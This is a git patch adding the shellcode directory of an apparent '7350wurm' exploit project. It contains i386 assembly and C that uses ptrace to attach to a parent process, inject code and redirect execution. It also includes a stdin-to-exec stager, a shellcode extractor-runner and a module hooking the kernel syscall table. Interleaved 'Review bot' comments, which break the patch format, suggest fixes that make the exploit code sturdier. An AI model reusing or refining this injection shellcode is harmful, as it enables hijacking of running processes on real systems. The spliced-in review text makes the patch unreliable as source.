From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001 From: Root THC Date: Tue, 24 Feb 2026 12:42:47 +0000 Subject: initial --- exploits/7350wurm/shellcode/bambam.s | 230 ++++++++++++++++++++++ exploits/7350wurm/shellcode/codedump | Bin 0 -> 6555 bytes exploits/7350wurm/shellcode/codedump.c | 93 +++++++++ exploits/7350wurm/shellcode/pt/Makefile | 8 + exploits/7350wurm/shellcode/pt/README | 6 + exploits/7350wurm/shellcode/pt/rptrace.c | 42 ++++ exploits/7350wurm/shellcode/pt/rptrace.o | Bin 0 -> 1456 bytes exploits/7350wurm/shellcode/pt/x.tar.gz | Bin 0 -> 800 bytes exploits/7350wurm/shellcode/ptrace/ptrace-legit | Bin 0 -> 7622 bytes exploits/7350wurm/shellcode/ptrace/ptrace-legit.c | 192 ++++++++++++++++++ exploits/7350wurm/shellcode/t | Bin 0 -> 4994 bytes exploits/7350wurm/shellcode/t.c | 12 ++ exploits/7350wurm/shellcode/write-read-exec.s | 38 ++++ 13 files changed, 621 insertions(+) create mode 100644 exploits/7350wurm/shellcode/bambam.s create mode 100644 exploits/7350wurm/shellcode/codedump create mode 100644 exploits/7350wurm/shellcode/codedump.c create mode 100644 exploits/7350wurm/shellcode/pt/Makefile create mode 100644 exploits/7350wurm/shellcode/pt/README create mode 100644 exploits/7350wurm/shellcode/pt/rptrace.c create mode 100644 exploits/7350wurm/shellcode/pt/rptrace.o create mode 100644 exploits/7350wurm/shellcode/pt/x.tar.gz create mode 100644 exploits/7350wurm/shellcode/ptrace/ptrace-legit create mode 100644 exploits/7350wurm/shellcode/ptrace/ptrace-legit.c create mode 100644 exploits/7350wurm/shellcode/t create mode 100644 exploits/7350wurm/shellcode/t.c create mode 100644 exploits/7350wurm/shellcode/write-read-exec.s (limited to 'exploits/7350wurm/shellcode') diff --git a/exploits/7350wurm/shellcode/bambam.s b/exploits/7350wurm/shellcode/bambam.s new file mode 100644 index 0000000..5719ed7 --- /dev/null +++ b/exploits/7350wurm/shellcode/bambam.s 
@@ -0,0 +1,230 @@
+
+ .globl cbegin
+ .globl cend
+
+
+cbegin:
+/* getppid */
+ pushl $64
+ popl %eax
+ int $0x80
+/* movl %eax, %ecx */
+ pushl %eax
+ xchgl %ebp, %eax
+
+/* z_fork */
+ pushl $2
+ popl %eax
+ int $0x80
+ or %eax, %eax
+ je fchild
+
+ /* waitpid (pid, NULL, 0) */
+ pushl $7
+ popl %esi
+ xchgl %esi, %eax /* eax = 7, esi = ppid */
+ xorl %ecx, %ecx
+ xorl %edx, %edx
+ int $0x80
+
+ xorl %eax, %eax
+ movb $162, %al
+ pushl $10
+ pushl $10
+ movl %esp, %ebx
+ movl %esp, %ecx
+ int $0x80
+ui:
+jmp ui
+ /* exit */
+fexit:
+
+ pushl $1
+ popl %eax
+ xorl %ebx, %ebx
+ int $0x80
+
+/*** CHILD ***/
+fchild: pushl $2 /* second fork */
+ popl %eax
+ int $0x80
+
+ or %eax, %eax
+ jne fexit
+
+ popl %ecx /* parent process pid */
+/* ptrace attach */
+ pushl $26
+ popl %eax
+ cdq
+ pushl $16
+ popl %ebx
+ xorl %esi, %esi
+ int $0x80
+
+/* ptrace peekdata */
+ movl $0x08048210, %edx
+/* movl $0xbf7ff010, %edx */
+ movl $0xbffff010, %esi
+ pushl $127
+ popl %edi
+loopa:
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $2
+ popl %ebx
+ pushl %edi
+ int $0x80
+ popl %edi
+ incl %edx
+ incl %esi
+ decl %edi
+ jnz loopa
+
+/* ptrace getregs */
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $12
+ popl %ebx
+ pusha
+ movl %esp, %esi
+ int $0x80
+
+/* ptrace setregs */
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $13
+ popl %ebx
+ movl %esp, %esi
+ movl 48(%esi), %edi
+ pushl %edi
+ movl $0x08048210, 48(%esi)
+/* movl $0xbf7ff010, 48(%esi)*/
+ int $0x80
+
+ jmp pointX
+pointY:
+
+ popl %esi
+ movl $0x08048210, %edx
+ pushl $20
+ popl %edi
+loopc:
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $5
+ popl %ebx
+ pushl %edi
+ pushl %esi
+ movl (%esi), %esi
+ int $0x80
+ popl %esi
+ popl %edi
+ incl %edx
+ incl %esi
+ decl %edi
+ jnz loopc
+
+
+/* ptrace pokedata */
+/* movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $5
+ popl %ebx
+ movl $0xccccfeeb, %esi*/
+/* movl $0xbf7ff010, %edx*/
+ movl $0x08048210, %edx
+/* int $0x80*/
+
+/*ptrace cont */
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ cdq
+ pushl $7
+ popl %ebx
+ xorl %esi, %esi
+ int $0x80
+
+/* wait 4 */
+/* 0 on return */
+ cdq
+ movl %eax, %ebx
+ decl %ebx
+ movl %eax, %ecx
+ movb $114, %al
+ int $0x80
+
+/* ptrace pokedata */
+ movl $0x08048210, %edx
+ movl $0xbffff010, %esi
+/* movl $0xbf7ff010, %edx*/
+ pushl $127
+ popl %edi
+loopb:
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $5
+ popl %ebx
+ pushl %edi
+ pushl %esi
+ movl (%esi), %esi
+ int $0x80
+ popl %esi
+ popl %edi
+ incl %edx
+ incl %esi
+ decl %edi
+ jnz loopb
+
+/* ptrace setregs */
+ popl %edi
+ movl %ebp, %ecx
+ pushl $26
+ popl %eax
+ pushl $13
+ popl %ebx
+ movl %esp, %esi
+ movl %edi, 48(%esi)
+ int $0x80
+
+
+/* ptrace detach */
+ movl %ebp, %ecx
+ pushl $17
+ popl %ebx
+ pushl $26
+ popl %eax
+ cdq
+ movl %edx, %esi
+ int $0x80
+/* exit */
+ xorl %ecx, %ecx
+ incl %esi
+ xchgl %esi, %eax
+ int $0x80
+pointX:
+ call pointY
+
+ pushl $2 /* second fork */
+ popl %eax
+ int $0x80
+ or %eax, %eax
+ je pointA
+ int $0x3
+pointA:
+ jmp pointA
+
+
+
+
+
+cend:
+
+
diff --git a/exploits/7350wurm/shellcode/codedump b/exploits/7350wurm/shellcode/codedump
new file mode 100644
index 0000000..d442fa7
Binary files /dev/null and b/exploits/7350wurm/shellcode/codedump differ
diff --git a/exploits/7350wurm/shellcode/codedump.c b/exploits/7350wurm/shellcode/codedump.c
new file mode 100644
index 0000000..9494b9e
--- /dev/null
+++ b/exploits/7350wurm/shellcode/codedump.c
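Review bot: Several comments in this hunk no longer describe the code beside them: `/* movl %eax, %ecx */` sits above `pushl %eax` / `xchgl %ebp, %eax`, which is not that instruction, and the `/* ptrace pokedata */` heading is attached to a fully commented-out block after the `loopc` loop it actually describes, while `loopc` itself has no heading at all. The two target addresses `0x08048210` and `0xbffff010` are repeated as bare literals with a commented-out alternate (`/* movl $0xbf7ff010, ... */`) next to each; defining them once with `.equ` (for example `.equ TEXT_ADDR, 0x08048210`) and deleting the dead alternates would make the hunk reviewable. The `ui: jmp ui` and `pointA: jmp pointA` spin loops deserve a one-line comment stating they are deliberate and never return, since the `/* exit */` path at `fexit` is only reached through the `jne fexit` after the second fork. The hunk spans two physical lines of this rendering but is complete.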
@@ -0,0 +1,93 @@ +/* shellcode extraction utility, + * by type / teso, small mods by scut. + */ + + +#include +#include +#include + +#ifdef IRIX +#include +#endif + +#ifdef HPUX +extern char * cbegin; +extern char * cend; +#else +extern void cbegin (); +extern void cend (); +#endif + +typedef void (* fptr)(void); + +int +bad (unsigned char u); + + +int +main (int argc, char *argv[]) +{ + int i, + bbytes = 0; + unsigned char * buf = (unsigned char *) cbegin; + + unsigned char ebuf[1024]; + fptr ebuf_p = (fptr) &ebuf[0]; + + + fprintf (stderr, "/* %lu byte shellcode */\n", + (unsigned long int) cend - (unsigned long int) cbegin); + + for (i = 0 ; buf < (unsigned char *) cend; ++buf) { + if (i % 12 == 0 && buf > (unsigned char *) cbegin) + printf ("\n"); + if (i % 12 == 0) + printf ("\""); + + if (bad (*buf & 0xff)) { + printf ("_\\x%02x_", *buf & 0xff); + bbytes += 1; + } else { + printf ("\\x%02x", *buf & 0xff); + } + + if (++i >= 12) { + i = 0; + printf ("\""); + } + } + if (i % 12 == 0) + printf (";\n"); + else + printf ("\";\n"); + + printf("\n"); + + fprintf (stderr, "bad bytes = %d\n", bbytes); + + if (argc > 1) { + memcpy (ebuf, cbegin, (unsigned long int) cend - + (unsigned long int) cbegin); +#ifdef IRIX + memcpy (ebuf + ((unsigned long int) cend - + (unsigned long int) cbegin), "/bin/sh\x42_ABCDEFGHIJKLMNOPQRSTUVWXYZ", 40); + cacheflush (ebuf, sizeof (ebuf), BCACHE); +#endif + ebuf_p (); + } + + exit (EXIT_SUCCESS); +} + + +int +bad (unsigned char u) +{ + if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25') + return (1); + + return (0); +} + + diff --git a/exploits/7350wurm/shellcode/pt/Makefile b/exploits/7350wurm/shellcode/pt/Makefile new file mode 100644 index 0000000..e5e1fd5 --- /dev/null +++ b/exploits/7350wurm/shellcode/pt/Makefile @@ -0,0 +1,8 @@ + +all: rptrace.c + rm -f rptrace.o + gcc -c -I/usr/src/linux/include -O2 -Wall rptrace.c -o rptrace.o + +clean: + rm -f rptrace.o + 
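Review bot: The `argc > 1` branch copies `cend - cbegin` bytes into the fixed `ebuf[1024]` without comparing that length to the buffer, so a payload larger than 1024 bytes overruns the stack before anything runs; compute `unsigned long int len = (unsigned long int) cend - (unsigned long int) cbegin;` once at the top of `main` and guard the copy with `if (len > sizeof ebuf) { fprintf (stderr, "shellcode larger than ebuf\n"); exit (EXIT_FAILURE); }`. The following `ebuf_p ()` call executes code out of an automatic array, which only works on a system whose stack is mapped executable; a comment on that line stating the requirement would save the next reader a puzzling segfault. `bad ()` also needs a one-line comment saying what the four flagged values (`0x00`, `0x0a`, `0x0d`, `0x25`) have in common, since the caller only reports a count. The `#include` directives in this rendering carry no header names, presumably lost in extraction, so I could not confirm that `<string.h>` is included for `memcpy`.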
diff --git a/exploits/7350wurm/shellcode/pt/README b/exploits/7350wurm/shellcode/pt/README
new file mode 100644
index 0000000..0139382
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/README
@@ -0,0 +1,6 @@
+This is a *simple* HACK to get around the ptrace/exec security problem
+in linux <2.2.19. It simply disables ptrace for everyone except root.
+Just make, and insmod the .o .. and your uptime will be preserved! :P
+
+-MadCamel (madcamel@energymech.net)
+
diff --git a/exploits/7350wurm/shellcode/pt/rptrace.c b/exploits/7350wurm/shellcode/pt/rptrace.c
new file mode 100644
index 0000000..f7de48b
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/rptrace.c
@@ -0,0 +1,42 @@
+#define MODULE
+#define __KERNEL__
+#include
+#include
+#include
+#include
+#include
+
+struct task_struct *init_hook = NULL;
+extern void *sys_call_table[];
+
+int (*o_ptrace)(int, int, int, int);
+
+int n_ptrace(int req, int pid, int addr, int data)
+{
+ int r;
+
+ r = o_ptrace(req, pid, addr, data);
+ printk ("PTRACE (%08x, %08x, %08x, %08x) = %08x\n", req, pid, addr, data, r);
+ return (r);
+}
+
+#define REPLACE(x) o_##x = sys_call_table[__NR_##x];\
+ sys_call_table[__NR_##x] = n_##x
+int init_module(void)
+{
+ lock_kernel();
+ EXPORT_NO_SYMBOLS;
+ REPLACE(ptrace);
+ unlock_kernel();
+ return(0);
+}
+
+#define RESTORE(x) sys_call_table[__NR_##x] = o_##x
+int cleanup_module(void)
+{
+ lock_kernel();
+ RESTORE(ptrace);
+ unlock_kernel();
+ return(0);
+}
+
diff --git a/exploits/7350wurm/shellcode/pt/rptrace.o b/exploits/7350wurm/shellcode/pt/rptrace.o
new file mode 100644
index 0000000..dd3bc56
Binary files /dev/null and b/exploits/7350wurm/shellcode/pt/rptrace.o differ
diff --git a/exploits/7350wurm/shellcode/pt/x.tar.gz b/exploits/7350wurm/shellcode/pt/x.tar.gz
new file mode 100644
index 0000000..06ba614
Binary files /dev/null and b/exploits/7350wurm/shellcode/pt/x.tar.gz differ
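Review bot: `n_ptrace` does not do what the README beside it claims: it forwards every request unconditionally to `o_ptrace` and only logs the result, so ptrace is not disabled for non-root callers. Either the README should say the module logs ptrace calls, or the hook needs the check it advertises — on a 2.2-era tree something like `if (current->euid != 0) return -EPERM;` before the forwarding call, with the field name confirmed against the target kernel's `task_struct`. The `printk` has no log-level prefix, so the line lands at the default level; `printk (KERN_INFO "PTRACE (%08x, %08x, %08x, %08x) = %08x\n", ...)` keeps it predictable. The hook type `int (*)(int, int, int, int)` is assigned from `sys_call_table` through a `void *` with no check against the kernel's own `sys_ptrace` prototype, which I believe takes `long` arguments in 2.2; worth confirming, since a mismatch silently corrupts the logged values. `init_hook` is declared but never used and can be dropped.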
diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit b/exploits/7350wurm/shellcode/ptrace/ptrace-legit
new file mode 100644
index 0000000..e3e02c1
Binary files /dev/null and b/exploits/7350wurm/shellcode/ptrace/ptrace-legit differ
diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c
new file mode 100644
index 0000000..870da8a
--- /dev/null
+++ b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c
@@ -0,0 +1,192 @@ +/* -scutstyle */ + +#include +#include +#include +#include +#include +#include +#include + + +pid_t z_fork (void); +void hexdump (unsigned char *data, unsigned int amount); + +unsigned char shellcode[] = "\x90\x90\xcc\x73"; + +int +main (int argc, char *argv[]) +{ + pid_t cpid; + struct user regs; + unsigned long int safed_eip; + unsigned long int addr, + addr_walker; + unsigned char data_saved[256]; + + +#if 0 + if (argc != 2 || sscanf (argv[1], "%d", &cpid) != 1) { + printf ("usage: %s \n", argv[0]); + exit (EXIT_FAILURE); + } +#endif + cpid = getppid(); + if (z_fork () != 0) { + printf ("parent. exiting.\n"); + exit (EXIT_FAILURE); + } + + printf ("pid = %d\n", cpid); + + printf ("exploiting\n\n"); + + if (ptrace (PTRACE_ATTACH, cpid, NULL, NULL) < 0) { + perror ("ptrace"); + exit (EXIT_FAILURE); + } + + /* save data */ + addr = 0xbffff010; + for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) { + data_saved[addr_walker] = ptrace (PTRACE_PEEKDATA, cpid, + addr + addr_walker, NULL); + } + hexdump (data_saved, sizeof (data_saved)); + + /* write */ + for (addr_walker = 0 ; addr_walker < sizeof (shellcode) ; + ++addr_walker) + { + ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker, + shellcode[addr_walker] & 0xff); + } + + /* redirect eip */ + memset (®s, 0, sizeof (regs)); + if (ptrace (PTRACE_GETREGS, cpid, NULL, ®s) < 0) { + perror ("ptrace PTRACE_GETREGS"); + exit (EXIT_FAILURE); + } + // write eip */ + safed_eip = regs.regs.eip; + regs.regs.eip = 0xbffff010; + if (ptrace (PTRACE_SETREGS, cpid, NULL, ®s) < 0) { + perror ("ptrace PTRACE_GETREGS"); + exit (EXIT_FAILURE); + } + + if (ptrace (PTRACE_CONT, cpid, NULL, NULL) < 0) { + perror ("ptrace PTRACE_CONT"); + exit (EXIT_FAILURE); + } + + wait (NULL); + printf ("detrap\n"); + + /* restore */ + for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) { + ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker, + data_saved[addr_walker] & 0xff); + } + + /* restore regs */ + regs.regs.eip = 
safed_eip; + if (ptrace (PTRACE_SETREGS, cpid, NULL, ®s) < 0) { + perror ("ptrace PTRACE_GETREGS"); + exit (EXIT_FAILURE); + } + + if (ptrace (PTRACE_DETACH, cpid, NULL, NULL) < 0) { + perror ("ptrace PTRACE_DETACH"); + exit (EXIT_FAILURE); + } + + exit (EXIT_SUCCESS); +} + + + +void +hexdump (unsigned char *data, unsigned int amount) +{ + unsigned int dp, p; /* data pointer */ + const char trans[] = + "................................ !\"#$%&'()*+,-./0123456789" + ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm" + "nopqrstuvwxyz{|}~...................................." + "....................................................." + "........................................"; + + for (dp = 1; dp <= amount; dp++) { + printf ("%02x ", data[dp-1]); + if ((dp % 8) == 0) + printf (" "); + if ((dp % 16) == 0) { + printf ("| "); + p = dp; + for (dp -= 16; dp < p; dp++) + printf ("%c", trans[data[dp]]); + printf ("\n"); + } + } + if ((amount % 16) != 0) { + p = dp = 16 - (amount % 16); + for (dp = p; dp > 0; dp--) { + printf (" "); + if (((dp % 8) == 0) && (p != 8)) + printf (" "); + } + printf (" | "); + for (dp = (amount - (16 - p)); dp < amount; dp++) + printf ("%c", trans[data[dp]]); + } + printf ("\n"); + + return; +} + + +/* z_fork + * + * fork and detach forked client completely to avoid zombies. + * taken from richard stevens excellent system programming book :) thanks, + * whereever you are now. + * + * caveat: the pid of the child has already died, it can just be used to + * differentiate between parent and not parent, the pid of the + * child is inaccessibly. 
+ *
+ * return pid of child for old process
+ * return 0 for child
+ */
+
+pid_t
+z_fork (void)
+{
+ pid_t pid;
+
+ pid = fork ();
+ if (pid < 0) {
+ return (pid);
+ } else if (pid == 0) {
+ /* let the child fork again
+ */
+
+ pid = fork ();
+ if (pid < 0) {
+ return (pid);
+ } else if (pid > 0) {
+ /* let the child and parent of the second child
+ * exit
+ */
+ exit (EXIT_SUCCESS);
+ }
+
+ return (0);
+ }
+
+ waitpid (pid, NULL, 0);
+
+ return (pid);
+}
diff --git a/exploits/7350wurm/shellcode/t b/exploits/7350wurm/shellcode/t
new file mode 100644
index 0000000..eb3478b
Binary files /dev/null and b/exploits/7350wurm/shellcode/t differ
diff --git a/exploits/7350wurm/shellcode/t.c b/exploits/7350wurm/shellcode/t.c
new file mode 100644
index 0000000..7c1aa4f
--- /dev/null
+++ b/exploits/7350wurm/shellcode/t.c
@@ -0,0 +1,12 @@
+
+#include
+
+int
+main (int argc, char *argv[])
+{
+ char * foo[4] = { "./codedump", "a", "b", NULL };
+
+ execve (foo[0], foo, NULL);
+}
+
+
diff --git a/exploits/7350wurm/shellcode/write-read-exec.s b/exploits/7350wurm/shellcode/write-read-exec.s
new file mode 100644
index 0000000..6f3956c
--- /dev/null
+++ b/exploits/7350wurm/shellcode/write-read-exec.s
@@ -0,0 +1,38 @@
+ .globl cbegin
+ .globl cend
+
+cbegin:
+
+/* write: ebx = fd, ecx = where, edx = length, eax = 4 */
+wr_pos: xorl %ebx, %ebx
+ incl %ebx /* ebx = 1 */
+
+ movl $0x0b51740b, %eax
+ subl $0x01010101, %eax
+ push %eax
+ movl %esp, %ecx /* ecx = "AAA\n" */
+
+ push $0x04
+ pop %eax /* eax = 4 */
+ movl %eax, %edx
+
+ int $0x80 /* write (1, "AAA\n", 4) */
+
+ jmp ctramp
+rd_cde: xorl %ebx, %ebx
+ mull %ebx /* ebx = eax = edx = 0 */
+
+ decb %dl /* edx = 0xff */
+ popl %ecx /* ecx = ncode */
+
+ push $0x3
+ pop %eax
+
+ int $0x80 /* read (0, ncode, 0xff) */
+ jmp ncode
+
+ctramp: call rd_cde
+ncode:
+
+cend:
+
-- cgit v1.3
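Review bot: Both `PTRACE_SETREGS` failure paths in `main` report `perror ("ptrace PTRACE_GETREGS")`, copied from the GETREGS check above them, so a failed register write is logged as a failed read; both strings should be `"ptrace PTRACE_SETREGS"`. The save loop stores the `long` returned by `ptrace (PTRACE_PEEKDATA, ...)` into an `unsigned char` and never clears or inspects `errno`, so only the low byte of each word is kept and a return of -1 cannot be told apart from data; the write-back loop has the same word/byte mismatch, so the `/* restore */` comment overstates what it does and should say so. `// write eip */` mixes the two comment syntaxes and should be `/* write eip */`. `main` is split across three physical lines of this rendering; the hunk itself is complete.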
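Review bot: The comment `/* ecx = "AAA\n" */` on the `wr_pos` block does not match the constant it annotates: `0x0b51740b - 0x01010101` is `0x0a50730a`, which in little-endian byte order is `"\nsP\n"`, so the `write` call emits those four bytes rather than `AAA\n`; the `/* write (1, "AAA\n", 4) */` comment on the `int $0x80` line repeats the error and both should be corrected, or the constant changed if `AAA\n` was the intent. The register-by-register comments on `rd_cde` are accurate and are the style the first block should match.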